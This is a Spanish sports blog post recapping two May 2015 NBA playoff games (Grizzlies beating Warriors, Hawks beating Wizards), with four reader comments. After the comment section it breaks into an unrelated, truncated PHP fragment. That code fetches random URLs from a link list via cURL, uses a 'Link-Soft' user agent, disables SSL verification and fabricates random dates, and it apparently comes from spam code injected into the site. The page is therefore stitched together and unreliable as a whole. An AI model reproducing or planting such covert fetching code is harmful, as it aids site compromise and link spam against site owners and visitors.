La Crónica: La Máscara

06 de May de 2015 por txusma

Estos playoffs van de Cid Campeadores, de bases que no tienen miedo a jugarse el físico cuando saben que sus equipos les necesitan. Si hace unos días fue Chris Paul el que se mantenía en pista a pesar de una lesión, ayer fue Mike Conley el que saltaba a la pista a pesar de tener un ojo a la virulé y haberse operado una fractura en el rostro hace apenas 8 días. En Atlanta, John Wall fue baja pero tampoco dudamos de que si hubiera hecho falta se hubiese calzado las zapatillas y hubiera dado lo mejor de sí mismo. Jugadores de otra pasta.

Memphis Grizzlies 97 – Golden State Warriors 90

Ya lo dijimos en la crónica del primer partido: “Por suerte, los Grizzlies le pueden poner nombre a su margen de mejora: Mike Conley“. Comprobando el estado de su ojo izquierdo no teníamos nada claro que el base de los Grizzlies pudiera llegar a vestirse de corto en lo que quedaba de playoffs pero en esta postemporada bastante dada a las heroicidades, Conley no podía quedarse impasible viendo como sus compañeros  se enfrentaban a los líderes de la liga. Tras participar suavemente en el entrenamiento matinal, médicos, entrenadores y el propio jugador decidieron conjuntamente que Conley fuera de la partida vistiendo una máscara de protección. El efecto fue inmediato desde el primer minuto. Zach Randolph y “el amigo de Greg Oden” (un saludo a todos los que minusvaloraron a  Conley en 2007) anotaron 19 puntos en el primer cuarto y lo Grizzlies llegaron a acumular una ventaja de 11 puntos. Por los locales solo Stephen Curry parecía repuesto de la sorpresa de ver a Conley sobre el parqué. En el segundo cuarto apareció la temida defensa de los Grizzlies, con Tony Allen a la cabeza dejaron a los “Splash Brothers” en 5 puntos con un 2 de 13 en TC y gracias a un parcial de 9-0 en los últimos instantes de la primera parte Memphis se fue al descanso con 11 puntos de ventaja. Los Warriors solo habían sido capaces de anotar 39 puntos en 24 minutos, algo que sólo había sucedido en otra ocasión en toda la temporada y no había sido en el Oracle Arena. Los visitantes no bajaron el nivel ni un ápice en la 2ª parte y llegaron a gozar de hasta 16 puntos de ventaja a mitad del tercer cuarto. En ningún momento Mike Conley y los suyos perdieron el control de la situación y los molones Warriors no pudieron sinó hincar la rodilla ante la superioridad manifiesta de sus rivales.

MVP: Mike Conley (22 puntos) y Zach Randolph (22 puntos, 7 rebotes y 4 asistencias) 

Washington Wizards 90 – Atlanta Hawks 106

Minutos antes del inicio del partido saltava la noticia: John Wall era baja por un esguince en su muñeca. Una noticia así tiene un efecto inmediato en los jugadores. Por un lado, sus compañeros se conjuran y se prometen dar el 120% para paliar su ausencia. Por el otro, los rivales se confían y se relajan al no tener que enfrentarse a una de sus mayores preocupaciones. Eso fue lo que pasó anoche en el Philips Arenas de Atlanta. A pesar de lo que pueda indicar el resultado los Wizards se defendieron como gato panza arriba: Ramon Sessions cubrió lo mejor que pudo la baja de Wall, y junto a Bradley Beal, Paul Pierce y Otto Porter Jr. exigió el máximo a los jugadores de Mike Budenholzer. Instantes antes del final del tercer cuarto el marcador estaba empatado e hicieron falta los mejores momentos de Al Horford para superar dos intentos de remontada de los visitantes en los últimos 12 minutos. Demarre Carroll sigue en estado de gracia y anotó más de 20 puntos por 6º partido consecutivo.

MVP: Demarre Carroll (22 puntos, 6 rebotes y 4 asistencias)

Comenta

4 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Bastante sorprendido por la victoria de Grizzlies, la verdad. Gran defensa y de todas formas muy fallones los Warriors. Creo que estaban jugando de pachanga en muchos minutos de estos PO, la verdad. No les vendrá mal una cura de humildad.

    Los Hawks hicieron lo que tenían que hacer, y ahora a pensar en recuperar el factor cancha.

    Por otro lado, Adam Silver sobre la estrategia del Hack-a-Jugador:

    “He escuchado las opiniones de algunos de los más grandes en nuestras reuniones de dueños, Michael Jordan, Larry Bird… su visión es que los jugadores tienen que meter los tiros libres. Y eso me ha influenciado… soy reacio a hacer un cambio con respecto a eso”.

    ahí queda eso 😀

      Citar

  2. Jose Luis dice:
    #2

    Ah, y el golpe de Draymond Green a la cara de Conley, me parece totalmente intencionado.

      Citar

  3. jmpa dice:
    #3

    Josh Smith, D. Howard, DeAndre Jordan y otros “manos de piedra” tendrán que currar este verano.

    No era previsible que los Warriors pasaran por encima de los Grizzlies como hicieron con NOLA.
    Parece que todas las series pueden ser largas. 🙂
    …salvo que Griffin siga en modo MVP

      Citar

  4. GreenPride dice:
    #4

    Gran sorpresa para mi la victoria de los Warriors. Con Conley a un gran nivel superando la defensa de los Warriors, los Grizzlies jugaron un partido típico suyo y típico de Playoffs. Pocas equivocaciones, no permitir correr a los Warriors, hacerles jugar 5×5 y sufrir para sumar cada canasta. Eso unido a los robos de balón (enorme Tony Allen) puso el partido en el ritmo que gusta a los de Memphis y del que nunca pudieron ni supieron salir los de la Bahía de Oackland. Sin duda esto sirve de advertencia para un equipo que ha parecido imbatible en determinados momentos y que ahora tendrá que apretarse para jugar una verdadera serie de Playoffs siempre y cuando Conley siga pudiendo jugar. Va a ser muy bueno para el espectáculo.
    En el Este, sin Wall, los Wizards estuvieron muy cerca de dar otro susto y tumbar definitivamente a los Hawks. Con Sessions haciendo de Wall por momentos los de la capital USA nunca perdieron la cara al partido y fueron respondiendo a cada acelerón de los Hawks hasta que al final en el último cuarto acabaron por desfondarse. La serie se traslada a Washington con la sensación de que los Wizards han sido mejores y que pueden tumbar a los de Atlanta.
    Y hoy interesantísimo Cavs-Bulls, donde el rey tendrá que multiplicarse para evitar una derrota que les pondría casi fuera. Veremos si Chicago es capaz de jugar dos buenos partidos seguidos (y Rose también) y cómo supera Cleveland las bajas de JR y Love que tanto daño les hicieron en el primer partido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>